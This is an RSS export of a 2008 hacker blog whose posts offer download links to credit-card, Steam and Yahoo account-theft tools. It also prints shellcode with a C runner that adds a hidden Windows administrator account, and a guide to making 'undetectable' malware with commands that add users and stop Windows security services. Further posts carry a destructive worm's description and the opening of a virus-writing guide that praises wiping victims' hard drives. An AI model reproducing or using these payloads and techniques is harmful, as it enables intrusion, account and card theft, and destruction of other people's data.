﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0"><channel><title><![CDATA[BVT Lord Mishanity AKA PolDoom2002 Blog]]></title><link>http://blog.bitcomet.com/poldoom2002/</link><description><![CDATA[Hacking is not an crime....]]></description><language>en-us</language><copyright>bitcomet.com</copyright><pubDate>Fri, 26 Sep 2008 13:25:41 GMT</pubDate><lastBuildDate>Fri, 26 Sep 2008 13:25:41 GMT</lastBuildDate><generator>bitcomet.com</generator><docs>http://cyber.law.harvard.edu/rss/rss.html</docs><ttl>30</ttl><item><title><![CDATA[BLOG CHANGING!!!]]></title><link>http://blog.bitcomet.com/poldoom2002/post_68105/</link><description><![CDATA[<p>
Hy there my frends, i'm back, with new ideas, and y want to share to you all my think and thotz, first of all y want to ask all of you about my blog what to make with this blog.
</p>
<p>
^Ideas:?
</p>
<p>
*Should y change the topic?&nbsp;
</p>
<p>
*Only Hackers Thing?
</p>
<p>
*Whatever?
</p>
<p>
*Just make an comment and let my know...
</p>
<p>
&amp;&amp;&amp;
</p>
<p>
Y will see you're comments about 4-5 weeks from now, and y will make an &quot;rule&quot; with this blog and next that y will update the blog any day, plus y have an project that y will make know of him on the internet, it will be an awsome project programmed in ASM.
</p>
<p>
We will talk later about that but for now send you're thotz about this blog.
</p>
<p>
***
</p>
<p>
<img src="http://blog.doctissimo.fr/php/blog/19ans/images/Garfield%202-blog.jpg" alt="" hspace="5" vspace="5" width="454" height="303" /> 
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Fri, 26 Sep 2008 13:25:41 GMT</pubDate></item><item><title><![CDATA[Y AM IN HOSPITAL!!!]]></title><link>http://blog.bitcomet.com/poldoom2002/post_45337/</link><description><![CDATA[<p>
Y&quot;m seek..
</p>
<p>
<img src="http://image.guim.co.uk/sys-images/Technology/Pix/pictures/2007/09/12/hospital460.jpg" alt="" hspace="5" vspace="5" width="460" height="300" /> 
</p>
<p>
 :(..yesterday y was in &quot;operation room&quot; 07.06.2008&nbsp; 2-3 hours operation. Y have ossos kist!? :( now y &quot;speak&quot; to you from an laptop &quot;not mine&quot; with vodafone 3G....
</p>
<p>
<img src="http://www.itreviews.co.uk/graphics/normal/hardware/h592.jpg" alt="" hspace="5" vspace="5" width="335" height="312" />
</p>
<p>
good&nbsp; net* th0w...
</p>
<p>
Peace :D&nbsp;
</p>
<p>
&nbsp;
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Wed, 06 Aug 2008 14:51:17 GMT</pubDate></item><item><title><![CDATA[Graphiy Quest]]></title><link>http://blog.bitcomet.com/poldoom2002/post_40108/</link><description><![CDATA[<p> <strong>Graphics</strong> (from <a href="http://en.wikipedia.org/wiki/Ancient_Greek" title="Ancient Greek">Greek</a> <span><a href="http://en.wiktionary.org/wiki/%CE%B3%CF%81%CE%B1%CF%86%CE%B9%CE%BA%CF%8C%CF%82" title="wikt:&gamma;&rho;&alpha;&phi;&iota;&kappa;?&sigmaf;" class="extiw">&gamma;&rho;&alpha;&phi;&iota;&kappa;?&sigmaf;</a></span>; see <a href="http://en.wikipedia.org/wiki/-graphy" title="-graphy">-graphy</a>) are <a href="http://en.wikipedia.org/wiki/Visual" title="Visual" class="mw-redirect">visual</a> presentations on some surface, such as a wall, <a href="http://en.wikipedia.org/wiki/Canvas" title="Canvas">canvas</a>, computer screen, paper, or stone to <a href="http://en.wikipedia.org/wiki/Brand" title="Brand">brand</a>, inform, illustrate, or entertain. Examples are <a href="http://en.wikipedia.org/wiki/Photograph" title="Photograph">photographs</a>, <a href="http://en.wikipedia.org/wiki/Drawings" title="Drawings" class="mw-redirect">drawings</a>, <a href="http://en.wikipedia.org/wiki/Line_Art" title="Line Art" class="mw-redirect">Line Art</a>, <a href="http://en.wikipedia.org/wiki/Graphs" title="Graphs" class="mw-redirect">graphs</a>, <a href="http://en.wikipedia.org/wiki/Diagrams" title="Diagrams" class="mw-redirect">diagrams</a>, <a href="http://en.wikipedia.org/wiki/Typography" title="Typography">typography</a>, <a href="http://en.wikipedia.org/wiki/Number" title="Number">numbers</a>, <a href="http://en.wikipedia.org/wiki/Symbols" title="Symbols" class="mw-redirect">symbols</a>, <a href="http://en.wikipedia.org/wiki/Geometric" title="Geometric" class="mw-redirect">geometric</a> designs, <a href="http://en.wikipedia.org/wiki/Maps" title="Maps" class="mw-redirect">maps</a>, <a href="http://en.wikipedia.org/wiki/Engineering_drawings" title="Engineering drawings" class="mw-redirect">engineering drawings</a>, or other <a href="http://en.wikipedia.org/wiki/Image" title="Image">images</a>. Graphics often combine <a href="http://en.wikipedia.org/wiki/Character_%28computer%29" title="Character (computer)" class="mw-redirect">text</a>, <a href="http://en.wikipedia.org/wiki/Illustration" title="Illustration">illustration</a>, and <a href="http://en.wikipedia.org/wiki/Color" title="Color">color</a>.
Graphic design may consist of the deliberate selection, creation, or
arrangement of typography alone, as in a brochure, flier, poster, web
site, or book without any other element. Clarity or effective
communication may be the objective, association with other cultural
elements may be sought, or merely, the creation of a distinctive style.
</p> <p>
Graphics can be functional or artistic. The latter can be a recorded
version, such as a photograph, or an interpretation by a scientist to
highlight essential features, or an artist, in which case the
distinction with imaginary graphics may become blurred.
</p> <p>
*** Graphiy Quest ***
</p> <p>
who give me the best graph made by him with TH3 Mastermind name will have an gift and one fuc*ing insane gift :D... Some Ex:
</p> <p> <img src="http://image.blog.bitcomet.com/postpic/20080608/2072354_vdszqn080608091116.jpg" alt="mastermind1280" title="mastermind1280" hspace="5" vspace="5" width="1280" height="1024" /> </p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Sun, 08 Jun 2008 09:11:58 GMT</pubDate></item><item><title><![CDATA[VBS TO EXE]]></title><link>http://blog.bitcomet.com/poldoom2002/post_39681/</link><description><![CDATA[<p>
VBS TO EXE....
</p>
<p>
<img src="http://www.discount-software.ws/discount-software-images/microsoft-visual-basic-6-enterprise-edition.jpg" alt="" hspace="5" vspace="5" width="472" height="566" />
</p>
<p>
http://rapidshare.com/files/119832875/Vbs_To_Exe.zip
</p>
<p>
***&nbsp;
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Tue, 03 Jun 2008 13:29:06 GMT</pubDate></item><item><title><![CDATA[1000VBSource]]></title><link>http://blog.bitcomet.com/poldoom2002/post_39680/</link><description><![CDATA[<p>
1000 Visual Basic Sources...
</p>
<p>
<img src="http://pagesperso-orange.fr/visual.basic/vb6.gif" alt="Visual Basic" title="Visual Basic" hspace="5" vspace="5" width="431" height="330" />
</p>
<p>
&nbsp;http://rapidshare.com/files/119830642/1000VBSource.rar
</p>
<p>
***
</p>
<p>
Sorry about my &quot;fly away&quot; from .NET scene...:D&nbsp;
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Tue, 03 Jun 2008 13:18:24 GMT</pubDate></item><item><title><![CDATA[STEAM HACK TOOLS]]></title><link>http://blog.bitcomet.com/poldoom2002/post_21727/</link><description><![CDATA[<img src="http://i239.photobucket.com/albums/ff4/sadecegircom/Games/steam_powered.jpg" alt="STEAM" title="STEAM" hspace="5" vspace="5" width="300" height="300" />
<p>
http://rapidshare.de/files/39107347/Steam_hacking_tools.rar.html&nbsp;
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Sun, 13 Apr 2008 12:26:42 GMT</pubDate></item><item><title><![CDATA[Credit Cardz Hacked=MONEY]]></title><link>http://blog.bitcomet.com/poldoom2002/post_20329/</link><description><![CDATA[<p>
<img src="http://fininformer.com/wp-content/uploads/2007/12/1_credit-cards.jpg" alt="" title="Credit Cards" hspace="5" vspace="5" />
</p>
<p>
****
</p>
<p>
So letz start these tools probaly will be banned in 24-48h :D 
</p>
<p>
****
</p>
<p>
Y dont give a damn how you use these so y am not you.:D
</p>
<p>
Personaly y dont use theze thing5...
</p>
<p>
&nbsp;&nbsp; TAKE CARE...IP HIDE :D
</p>
<p>
<img src="/Emotions/tu/8.gif" border="0" alt="" align="absmiddle" /><img src="/Emotions/tu/8.gif" border="0" alt="" align="absmiddle" /><img src="/Emotions/tu/8.gif" border="0" alt="" align="absmiddle" />&nbsp;
</p>
<p>
&nbsp;http://rapidshare.com/files/102825025/CCZA1.rar
</p>
<p>
***
</p>
<p>
PEACE...&nbsp;
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Thu, 27 Mar 2008 14:07:13 GMT</pubDate></item><item><title><![CDATA[Paypal Donation....]]></title><link>http://blog.bitcomet.com/poldoom2002/post_20326/</link><description><![CDATA[<p>
&lt;!-- Begin PayPal Logo --&gt;&lt;A HREF=&quot;https://www.paypal.com/ro/mrb/pal=9NHA3MGKNJ8S6&quot; target=&quot;_blank&quot;&gt;&lt;IMG&nbsp; SRC=&quot;http://images.paypal.com/en_US/i/bnr/paypal_mrb_banner.gif&quot; BORDER=&quot;0&quot; ALT=&quot;Sign up for PayPal and start accepting credit card payments instantly.&quot;&gt;&lt;/A&gt;&lt;!-- End PayPal Logo --&gt;
</p>
<p>
****
</p>
<p>
An account for home less :))) just kiddind...
</p>
<p>
Send all money to there for My prgz/// BVT GRP... Peace...:D
</p>
<p>
https://www.paypal.com/ro/mrb/pal=9NHA3MGKNJ8S6&nbsp;
</p>
<p>
<img src="/Emotions/tu/2.gif" border="0" alt="" align="absmiddle" /><img src="/Emotions/tu/2.gif" border="0" alt="" align="absmiddle" /><img src="/Emotions/tu/2.gif" border="0" alt="" align="absmiddle" /><img src="/Emotions/baozi/30.gif" border="0" alt="" align="absmiddle" /> 
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Thu, 27 Mar 2008 13:55:41 GMT</pubDate></item><item><title><![CDATA[BackTrack 3]]></title><link>http://blog.bitcomet.com/poldoom2002/post_14455/</link><description><![CDATA[<p>
BackTrack is the most Top rated linux live distribution focused on
penetration testing.
With no installation whatsoever, the analysis platform is started
directly from the CD-Rom and is fully accessible within minutes.
<br /> <br />
It's evolved from the merge of the two wide spread distributions -
<strong>Whax</strong> and <strong>Auditor Security Collection</strong>. By joining forces 
and replacing these distributions, BackTrack has gained massive
popularity and was voted in 2006 as the #1 Security Live Distribution 
by insecure.org.
Security professionals as well as new comers are using BackTrack as
their favorite toolset all over the globe.
<br /> <br />
BackTrack has a long history and was based on many different linux
distributions until it is now based on a Slackware linux distribution
and the corresponding live-CD scripts by Tomas M. (www.slax.org) . 
Every package, kernel configuration and script is <strong>optimized to be used by
security penetration testers</strong>. Patches and automation have been added, applied
or developed to provide a neat and ready-to-go environment.
<br /> <br />
After coming into a stable development procedure during the last
releases and consolidating feedbacks and addition, the team was focused to
support <strong>more and newer hardware</strong> as well as provide <strong>more flexibility and
modularity</strong> by restructuring the build and maintenance processes. With the current
version, most applications are built as individual modules which help
to speed up the maintenance releases and fixes.
<br /> <br />
Because Metasploit is one of the key tools for most analysts it is tightly
integrated into BackTrack and both projects collaborate together to
always provide an on-the-edge implementation of Metasploit within the
BackTrack CD-Rom images or the upcoming remote-exploit.org distributed and
maintained virtualization images (like VMWare images appliances).
<br /> <br />
Being superior while staying easy to use is key to a good security
live cd. We took things a step further and <strong>aligned BackTrack to penetration
testing methodologies and assessment frameworks</strong> (ISSAF and......</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Thu, 17 Jan 2008 05:33:15 GMT</pubDate></item><item><title><![CDATA[WIN32LOCALADMINUSER]]></title><link>http://blog.bitcomet.com/poldoom2002/post_13444/</link><description><![CDATA[<p>
This payload will load netapi32.dll and call NetUserAdd followed by NetLocalGroupAddMembers. It will create a new user account with the username and password of &quot;X&quot; and add it to the local group &quot;Administrators&quot;. This payload has been tested against Windows 2000 and Windows XP, it will not work on Windows 9x systems.
</p> <p>
Example Code<br />
---------------<br />
char code[] =<br />
&quot;\x66\x81\xec\x80\x00\x89\xe6\xe8\xba\x00\x00\x00\x89\x06\xff\x36&quot;<br />
&quot;\x68\x8e\x4e\x0e\xec\xe8\xc1\x00\x00\x00\x89\x46\x08\x31\xc0\x50&quot;<br />
&quot;\x68\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\x56\x08\x89\x46&quot;<br />
&quot;\x04\xff\x36\x68\x7e\xd8\xe2\x73\xe8\x9e\x00\x00\x00\x89\x46\x0c&quot;<br />
&quot;\xff\x76\x04\x68\x5e\xdf\x7c\xcd\xe8\x8e\x00\x00\x00\x89\x46\x10&quot;<br />
&quot;\xff\x76\x04\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14&quot;<br />
&quot;\x31\xc0\x31\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00&quot;<br />
&quot;\x68\x72\x00\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68&quot;<br />
&quot;\x6d\x00\x69\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00&quot;<br />
&quot;\x00\x00\x89\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50&quot;<br />
&quot;\x53\x50\x51\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e&quot;<br />
&quot;\x18\x49\x49\x51\x89\xe1\x6a\x01\x51\x6a\x03\xff\x76\x1c\x6a\x00&quot;<br />
&quot;\xff\x56\x14\xff\x56\x0c\x56\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c&quot;<br />
&quot;\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57\x8b&quot;<br />
&quot;\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b&quot;<br />
&quot;\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31&quot;<br />
&quot;\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24&quot;<br />
&quot;\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01&quot;<br />
&quot;\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b&quot;<br />
&quot;\xc2\x04\x00&quot;;
</p> <p> <br />
int main(int argc, char **argv)<br />
{<br />
&nbsp; int (*funct)();<br />
&nbsp; funct = (int (*)()) code;<br />
&nbsp;......</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Thu, 03 Jan 2008 16:34:16 GMT</pubDate></item><item><title><![CDATA[Undetectable Virus In 3 Stepse$$: How to create a new undetectable virus in 3 easy steps]]></title><link>http://blog.bitcomet.com/poldoom2002/post_12740/</link><description><![CDATA[<pre>
hackers online$$: How to create a new undetectable virus in 3 easy steps
Friday, November 2, 2007
How to create a new undetectable virus in 3 easy steps 
---------------------------------------------------------
This article will demonstrate how an average PC user can create a piece of 
malicious software in minutes that will be undetected by all the major 
anti-malware scanning engines.
This article is for informational purposes only and the author disclaims any 
responsibility for your use or misuse of any of the information contained 
herein.
It is well-known in blackhat circles that a new piece of malware, coded from 
scratch, will almost always bypass signature-based malware scanners. What is 
less known is that the skill needed to do this is minimal at best - an average 
user with no programming experience can cut and paste a few lines of code 
together and create a undetected malicious executable in 3 easy steps.
Most anti-virus scanners rely on a database of signatures for known viruses. 
Once a new virus is spread wide enough that it has been identified as malicious, 
the anti-virus vendors scramble to come up with a fingerprint to identify that 
strain of malware in the future. The obvious flaw in this process is that a new 
piece of malware will bypass the scanners by default, until it is widespread 
enough to be noticed by security researchers or picked up by a dummy node. There 
is always a window of opportunity for new malware between the time of deployment 
and the update of the signature databases and as recent malware trends 
demonstrate, this window is large enough to make a profit for the authors.
Roll-your-own undetected malware in 3 easy steps!
Step 1: Commands to execute
Here we compile the DOS commands that our malware will execute into a DOS batch 
file. As a simple proof of concept, let&rsquo;s add a new user, disable the XP 
firewall, and create a directory on the C drive.
@echo off
net user hacksafe hacksafe /add
net stop &ldquo;Security Center&rdq......</pre>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Tue, 25 Dec 2007 06:42:16 GMT</pubDate></item><item><title><![CDATA[USB HACKER AIO]]></title><link>http://blog.bitcomet.com/poldoom2002/post_12440/</link><description><![CDATA[<p>
<img src="http://www.ohgizmo.com/wp-content/uploads/2006/10/buslink_64gb.jpg" alt="" hspace="5" vspace="5" width="403" height="255" />
</p>
<p>
&nbsp;
</p>
<p>
*This is my personal version without any kind of virusses.*
</p>
<p>
!!!WARNING!!!&nbsp; - Use with care :D
</p>
<p>
|_____________________________________________________|
</p>
<p>
|Lord Mishanity/PolDoom2002/THe Mastermind/........................|&nbsp;  
</p>
<p>
|+++++++++++++++++++++++++++++++++++++++++++++++|
</p>
<p>
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
</p>
<p>
|_____________________________________________________|&nbsp;
</p>
<p>
http://rapidshare.com/files/77877883/HS_USB.exe
</p>
<p>
_____________________________________________
</p>
<p>
&quot;Your Th0tz are mine&quot; :D&nbsp;
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Thu, 20 Dec 2007 09:34:47 GMT</pubDate></item><item><title><![CDATA[Windows XP USB Edition]]></title><link>http://blog.bitcomet.com/poldoom2002/post_12333/</link><description><![CDATA[<p>
WINDOWS XP USB EDITION...
</p>
<p>
<img src="http://www.future-x.de/futurex/images/windows_xp-prostick.jpg" alt="" hspace="5" vspace="5" width="410" height="500" /><img src="http://theos.in/wp-content/uploads/2006/07/boot-windows-from-usb.jpg" alt="" hspace="5" vspace="5" width="425" height="289" />
</p>
<p>
&nbsp;http://rapidshare.com/files/77605277/Windows_XP_USB_Stick_Edition.rar
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Wed, 19 Dec 2007 04:56:39 GMT</pubDate></item><item><title><![CDATA[WGA PERMANENT PACHER]]></title><link>http://blog.bitcomet.com/poldoom2002/post_12014/</link><description><![CDATA[<p>
hy there ma frendz....<img src="/Emotions/dump/2.gif" border="0" alt="" align="absmiddle" />
</p>
<p>
this WGA IS FOR:WINDOWS XP[VLK], SERVER2003[VLK], OFFICE XP.
</p>
<p>
http://rapidshare.com/files/76603899/Windows_WGA_Patcher_Permanent_Kit.rar&nbsp;
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Fri, 14 Dec 2007 16:54:17 GMT</pubDate></item><item><title><![CDATA[NATRIX...]]></title><link>http://blog.bitcomet.com/poldoom2002/post_10878/</link><description><![CDATA[<p>
some photos from my Operating system :D 
</p>
<p>
http://rapidshare.com/files/72352567/NATRIX_IMG.rar <img src="/Emotions/dump/2.gif" border="0" alt="" align="absmiddle" /><img src="/Emotions/dump/2.gif" border="0" alt="" align="absmiddle" /><img src="/Emotions/dump/2.gif" border="0" alt="" align="absmiddle" /> 
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Thu, 29 Nov 2007 13:20:08 GMT</pubDate></item><item><title><![CDATA[THe IP Changer]]></title><link>http://blog.bitcomet.com/poldoom2002/post_9561/</link><description><![CDATA[<p>
THe IP Changer..an verry used program in WIN *OSZ*
</p>
<p>
&nbsp;http://rapidshare.com/files/67890792/THe_IP_Changer.exe
</p>
<p>
&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&gt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;
</p>
<p>
&nbsp;
</p>
<p>
<img src="http://image.blog.bitcomet.com/postpic/20071109/2072354_lrbpaq071109212651.jpg" alt="vxchaos" title="vxchaos" hspace="5" vspace="5" width="500" height="208" /> 
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Fri, 09 Nov 2007 21:27:02 GMT</pubDate></item><item><title><![CDATA[CS 1.6 V26 PACK]]></title><link>http://blog.bitcomet.com/poldoom2002/post_9560/</link><description><![CDATA[<p>
+++++++++++++++++++++++++++++++++++++++++++++
</p>
<p>
*****************<font color="#ff0000">CS 1.6 Non-Steam Pack V26</font>***************************<br />
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
</p>
<p>
#############################################
</p>
<p>
_______________________________________________________________________ 
</p>
<p>
<img src="http://blog.pucp.edu.pe/media/116/20061110-counterstrike16frontei5.jpg" alt="" hspace="5" vspace="5" width="450" height="450" />
</p>
<p>
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
</p>
<p>
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<img src="http://www.games-fusion.net/images/skin_nav.jpg" alt="" hspace="5" vspace="5" width="460" height="358" />
</p>
<p>
<font color="#00ff00">________________________________________________________________________</font>&nbsp;
</p>
<p>
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
</p>
<p>
http://rapidshare.com/files/79143495/cs16patch_full_v26.exe
</p>
<p>
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
</p>
<p>
&nbsp;*NOTE* PROBALY IN 2-3 DAYS THE LINK WILL BE DELETED!!! 
</p>
<p>
Peace...&nbsp;
</p>
<p>
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <br />
&nbsp; 
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Fri, 09 Nov 2007 21:24:19 GMT</pubDate></item><item><title><![CDATA[Yahoo Mail Hacking....]]></title><link>http://blog.bitcomet.com/poldoom2002/post_2514/</link><description><![CDATA[<p>
HY THERE MY FRENDZ... 
</p>
<p>
http://rapidshare.com/files/67890718/Yahoo_Mail_Hack...rar
</p>
<p>
Peace to all....
</p>
<p>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <img src="/Emotions/dump/2.gif" border="0" alt="" align="absmiddle" /><br />
&nbsp; 
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Thu, 08 Nov 2007 19:20:53 GMT</pubDate></item><item><title><![CDATA[BackZat.C]]></title><link>http://blog.bitcomet.com/poldoom2002/post_2162/</link><description><![CDATA[<h2>BatzBack.C.Txt</h2> <hr /> <pre>
/*************************************************************************\
*VIRUS NAME: W32.BatzBack.HDFiller.C, W32.HLLW.BackZat.C                  *
*VIRUS TYPE: Retro I-Worm                                                 *
*VIRUS AUTHOR: L0NEw0lf                                                   *
*                                                                         *
*Replication:                                                             *
*This worm spreads through mapped drives, p2p software, Aim95, ICQ,       *
*Outlook, and mIrc                                                        *
*The worm also will infect EVERY .EXE on systems similiar to windows XP   *
*this does not include 95/98 or ME. it uses an overwriting method         *
*It will also append itself at the end to every .BAT file it finds        *
*The worm will also attempt to back itself up with restore on ME systems  *
*The worm will back itself up with restore on XP systems also, but        *
*ONLY on NTFS filesystems                                                 *
*After the worm is executed it will display a fake error message also     *
*it will delete large amounts of AntiVirus software                       *
*                                                                         *
*PAYLOAD:                                                                 *
*If the day is not Sunday the worm will write a file that completely      *
*invisible in the windows folder. This file may show up in Win95/98       *
*This file will find any file in the root directory and write             *
*L0NEw0lf was here... over and over again until the file is filling       *
*up the entire harddrive disk space. This goes pretty fast and            *
*very quietly. If it encountered and error it will stay in memory         *
*and lag the system.                                                      *
*On every Sunday the worm will display 3 messages and format              *
*D, E, and......</pre>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Tue, 06 Nov 2007 04:21:30 GMT</pubDate></item><item><title><![CDATA[CS 1.6 STEAM STEAL]]></title><link>http://blog.bitcomet.com/poldoom2002/post_2146/</link><description><![CDATA[<p>
http://rapidshare.com/files/67690701/STEAM_CLIENT_STEAL.exe
</p>
<p>
oh..y ..forget....the password is POLDOOM2002&nbsp;
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Mon, 05 Nov 2007 15:59:49 GMT</pubDate></item><item><title><![CDATA[Phunky Virus Writing Guide]]></title><link>http://blog.bitcomet.com/poldoom2002/post_2141/</link><description><![CDATA[<ul> <li>Part I
	<ul> <li><a href="http://vx.netlux.org/lib/vda07.html#p11">THE REPLICATOR</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p12">CONCEALER</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p13">THE BOMB</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p14">OFFSET PROBLEMS</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p15">TESTING</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p16">DISTRIBUTION</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p17">OVERWRITING VIRII</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p18">WELL, THAT JUST ABOUT...</a></li> </ul> </li> <li>Part II
	<ul> <li><a href="http://vx.netlux.org/lib/vda07.html#p21">INSTALLMENT II:  THE REPLICATOR</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p22">STEP 1 - FIND A FILE TO INFECT</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p23">STEP 2 - CHECK VERSUS INFECTION CRITERIA</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p24">STEP 3 - CHECK FOR PREVIOUS INFECTION</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p25">STEP 4 - INFECT THE FILE</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p26">STEP 5 - COVER YOUR TRACKS</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p27">WHAT'S TO COME</a></li> </ul> </li> <li>Part III
	<ul> <li><a href="http://vx.netlux.org/lib/vda07.html#p31">INSTALLMENT III:  NONRESIDENT VIRII, PART II</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p32">THE CONCEALER</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p33">THE DISPATCHER</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p34">THE BOMB</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p35">MEA CULPA</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p36">TIPS AND TRICKS</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p37">SO NOW</a></li> </ul> </li> <li>Part IV
	<ul> <li><a href="http://vx.netlux.org/lib/vda07.html#p41">INSTALLMENT IV: RESIDENT VIRII, PART I</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p42">INTERRUPTS</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p43">AN INTRODUCTION TO DOS MEMORY ALLOCATION</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p44">METHODS OF GOING RESIDENT</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p45">WHY RESIDENT?</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p46">STRUCTURE OF THE RESIDENT VIRUS</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p47">WHAT'S TO COME</a></li> </ul> </li> <li>Part V
	<ul> <li><a href="http://vx.netlux.org/lib/vda07.html#p51">INSTALLMENT V: RESIDENT VIRUSES, PART II</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p52">STRUCTURE</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p53">LOADING STUB</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p54">INSTALLATION CHECK</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p55">FIND THE TOP OF MEMORY</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p56">ALLOCATE THE HIGH MEMORY</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p57">COPY THE VIRUS TO HIGH MEMORY</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p58">SWAP INTERRUPT VECTORS</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p59">INTERRUPT HANDLER</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p5a">A THEORY ON RESIDENT VIRUSES</a></li> <li><a href="http://vx.netlux.org/lib/vda07.html#p5b">IF YOU DON'T UNDERSTAND IT YET</a></li> </ul> </li> </ul> <p>
Virii are wondrous creations written for the sole purpose of
spreading and destroying the systems of unsuspecting fools. This
eliminates the systems of simpletons who can't tell that there is a
problem when a 100 byte file suddenly blossoms into a 1,000 byte file.
Duh. These low-lifes do not deserve to exist, so it is our sacred duty
to wipe their hard drives off the face of the Earth. It is a simple
matter of speeding along survival of the fittest.
</p> <p>
Why did I create this guide? After writing several virii, I have
noticed that virus writers generally learn how to write virii either on
their own or by examining the disassembled code of other virii. There
is an incredible lack of information on the subject. Even books
published by morons such as Burger are, at best, sketchy on how to
create a virus. This guide will show you what it takes to write a virus
and also will give you a plethora of source code to include in your own
virii.
</p> <p>
Virus writing is not as hard as you might first imagine. To write an
